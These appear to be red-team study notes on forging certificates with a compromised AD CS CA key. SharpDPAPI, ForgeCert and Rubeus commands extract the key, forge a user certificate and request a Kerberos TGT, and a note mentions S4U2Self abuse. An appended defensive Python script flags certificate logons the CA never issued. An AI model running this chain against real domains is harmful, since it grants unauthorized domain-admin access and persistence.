In many cases the AD CS roles are not installed on the DCs, and domain admin rights are not needed to manage them. If a CA machine account is compromised, the CA's private key can be used to forge certificates that maintain persistence and elevate to domain admin.
Use SharpDPAPI to enumerate CA private keys:
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine
Save the keys into .pem and use openssl to convert to .pfx.
Create a forged certificate using ForgeCert.
C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\sub-ca.pfx --CaCertPassword [ca-cert-password] --Subject "CN=User" --SubjectAltName "[target-user]@[domain-fqdn]" --NewCertPath .\auth.pfx --NewCertPassword [auth-cert-password]
Request a TGT with certificate:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-user] /domain:[domain-fqdn] /enctype:aes256 /certificate:[cert-base64] /password:[cert-password] /nowrap
NOTE
It is also possible to create machine certificates and use S4U2Self abuse to access any domain-joined machine/service.
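Added example, not part of these notes: a defender-side check for the forgery described above. A certificate forged offline with the stolen CA key is never recorded in the CA's issued-certificate database, so a certificate-based TGT request (event 4768 carrying Certificate Information) whose serial is absent from that database, or whose issuer is not the enterprise CA, stands out. The event text, issuer name and serial values below are constructed sample data.

```python
import re

# Constructed sample: serials present in the CA's issued-certificate database.
# On a real CA this set comes from the database (e.g. `certutil -view -out SerialNumber csv`);
# a certificate forged with the stolen key is never written there.
ISSUED_SERIALS = {
    "1a0000000b3f2c1d9e8a7b6c5d000000000b",
    "1A0000000C4E7D2A1F9B8C7D6E000000000C",
}

# Constructed sample 4768 event bodies. The Certificate Information fields are filled
# only when the TGT was requested with a certificate (PKINIT); otherwise they are empty.
SAMPLE_EVENTS = [
    "Account Name: jdoe\nCertificate Issuer Name: sub-ca\n"
    "Certificate Serial Number: 1A0000000B3F2C1D9E8A7B6C5D000000000B",
    "Account Name: svc-backup\nCertificate Issuer Name: sub-ca\n"
    "Certificate Serial Number: 7F3A9C0E2B4D6F8A1C3E5B7D9F0A2C4E",
    "Account Name: wks01$\nCertificate Issuer Name: \nCertificate Serial Number: ",
]

FIELD = re.compile(
    r"^(Account Name|Certificate Issuer Name|Certificate Serial Number):[ \t]*(.*)$", re.M
)


def normalize_serial(serial):
    """Serials are hex; drop separators and case so database and event values compare equal."""
    return re.sub(r"[^0-9a-f]", "", serial.lower())


def parse_event(text):
    """Extract the fields this check needs; missing values become empty strings."""
    fields = {k: v.strip() for k, v in FIELD.findall(text)}
    return {
        "account": fields.get("Account Name", ""),
        "issuer": fields.get("Certificate Issuer Name", ""),
        "serial": normalize_serial(fields.get("Certificate Serial Number", "")),
    }


def find_unrecorded_cert_logons(events, issued_serials, ca_name):
    """Return certificate-based TGT requests the CA has no record of issuing."""
    known = {normalize_serial(s) for s in issued_serials}
    findings = []
    for ev in map(parse_event, events):
        if not ev["serial"]:
            continue  # password/key pre-auth, no certificate involved
        if ev["serial"] not in known or ev["issuer"] != ca_name:
            findings.append(ev)
    return findings


if __name__ == "__main__":
    for hit in find_unrecorded_cert_logons(SAMPLE_EVENTS, ISSUED_SERIALS, "sub-ca"):
        print(f"unrecorded certificate logon: {hit['account']} serial={hit['serial']}")
```

Run the same comparison against the real CA export and 4768 events on the DCs; a hit for a serial the CA never issued is the primary trace a forged certificate leaves.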